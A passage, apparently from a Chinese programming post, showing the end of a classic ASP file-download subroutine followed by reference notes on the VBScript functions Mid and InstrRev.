        objAdoStream.Type=1
        objAdoStream.open()
        objAdoStream.LoadFromFile(fname)
        strchar=objAdoStream.Read()
        fsize=objAdoStream.size
        objAdoStream.Close()
        Set objAdoStream=nothing

        Response.AddHeader "content-type","application/x-msdownload"
        response.AddHeader "Content-Disposition","attachment;filename=" & filename(ubound(filename))
        Response.AddHeader "content-length", fsize

        Response.BinaryWrite(strchar)
        Response.Flush()
      End Sub
%>
------------------------------------------------------------------------------------------------------------------------------

附1:

Mid 函数
返回 Variant (String)，其中包含字符串中指定数量的字符。
语法
Mid(string, start[, length])
start 必要参数。为 Long。string 中被取出部分的字符位置。如果 start 超过 string 的字符数，Mid 返回零长度字符串 ("")。
length 可选参数；为 Variant (Long)。要返回的字符数。如果省略或 length 超过文本的字符数（包括 start 处的字符），将返回字符串中从 start 到尾端的所有字符。

有可能是你的start变量值大于字符串长度,导致返回空字符串,或者是变量值为0,导致错误

附2:

InstrRev的用法

描述
返回某字符串在另一个字符串中出现的从结尾计起的位置。
语法
InstrRev(string1, string2[, start[, compare]])
InstrRev 函数的语法有以下参数：

参数描述
string1 必选。接受搜索的字符串表达式。
string2 必选。被搜索的字符串表达式。
start 可选。数值表达式，用于设置每次搜索的开始位置。如果省略，则默认值为 -1，表示从最后一个字符的位置开始搜索。如果 start 包含 Null，则出现错误。
compare 可选。在计算子字符串时，指示要使用的比较类型的数值。如果省略，将执行二进制比较。有关数值，请参阅“设置”部分。

设置
compare 参数可以有以下值：
常数 Value 描述
vbBinaryCompare 0 执行二进制比较。
vbTextCompare 1 执行文本比较。
vbDatabaseCompare 2 执行基于包含在数据库（在此数据库中执行比较）中的信息的比较。

返回值
InStrRev 返回以下值：
如果 InStrRev 返回
string1 为零长度 0
string1 为 Null Null
string2 为零长度 start
string2 为 Null Null
string2 没有找到 0
在 string1 中找到 string2 找到匹配字符串的位置
start > Len(string2) 0

说明
请注意 InstrRev 函数的语法不同于 Instr 函数的语法。